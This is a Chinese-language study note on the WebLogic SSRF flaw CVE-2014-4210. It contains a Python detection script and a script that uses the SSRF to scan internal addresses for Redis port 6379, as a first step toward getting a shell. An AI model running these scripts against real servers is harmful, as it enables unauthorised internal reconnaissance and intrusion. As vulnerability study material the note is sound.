weblogic ssrf 漏洞筆記

CVE-2014-4210

　　Oracle WebLogic web server即可以被外部主機訪問，同時也允許訪問內部主機。比如有一個jsp頁面SearchPublicReqistries.jsp，我們可以利用它進行攻擊，未經授權通過weblogic server連接任意主機的任意TCP 端口，可以能冗長的響應來推斷在此端口上是否有服務在監聽此端口。（ps:本人覺得挺雞肋的，要是目標機沒開redis的6379端口沒法getshll了。當然也是自己太菜）

1.weblogic_ssrf.py（僅能用來判斷是否有該漏洞）

      

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: weblogic SSRF漏洞(CVE-2014-4210)
referer: http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
author: Lucifer
description: weblogic 版本10.0.2 -- 10.3.6中SearchPublicRegistries.jsp，參數operator可傳入內網IP造成SSRF漏洞
'''
import sys
import warnings
import requests
from termcolor import cprint

class weblogic_ssrf_BaseVerify:
    def __init__(self, url):
        self.url = url

    def run(self):
        headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
                cprint("[+]存在weblogic SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")

        except:
            cprint("[-] "+__file__+"====>連接超時", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = weblogic_ssrf_BaseVerify(sys.argv[1])
    testVuln.run()

 

2.利用UDDI Explorerc查看內網ip段

　　如下圖可知目標機的內網IP為127.0.0.1

 

3.利用weblogic_redisscan.py掃描內網是否有6379端口，也就是redis服務

    #!/usr/bin/python
    # -*- coding: utf-8 -*-
     
    import httplib
    import  time
    from colorama import init,Fore
    init(autoreset=True)
    ips = ['127.0.0.']
    for j in ips:
        for i in range(1,255):
            try:
                print Fore.BLUE+'[-]Check '+j+str(i)
                conn = httplib.HTTPSConnection('xx.bbbb.com',80,timeout=5)
                conn.request(method="GET",url="/uddiexplorer/SearchPublicRegistries.jsp?operator=http://"+j+str(i)+\
                            ":6379&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search")
                conn.getresponse().read()
                conn.close()
                try:
                    conn = httplib.HTTPSConnection('xx.bbbb.com',80,timeout=5)
                    conn.request(method="GET",url="/uddiexplorer/SearchPublicRegistries.jsp?operator=https://"+j+str(i)+\
                                ":6379&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search")
                    conn.getresponse().read()
                    conn.close()
                    time.sleep(4)
                except:
                    print Fore.RED+'[+] '+j+str(i)+':6379 is open'
                    time.sleep(4)
            except:
                time.sleep(4)

 

 

 

　試了幾個網站，都掃不出6379端口，我就不往下寫了。未完待續......

   要是你掃了出來，這里有的redis getshell 的教程 web安全-SSRF實戰

 

 

參考鏈接：【1】http://www.sohu.com/a/210792763_100014967

                 【2】http://www.tiaozhanziwo.com/archives/777.html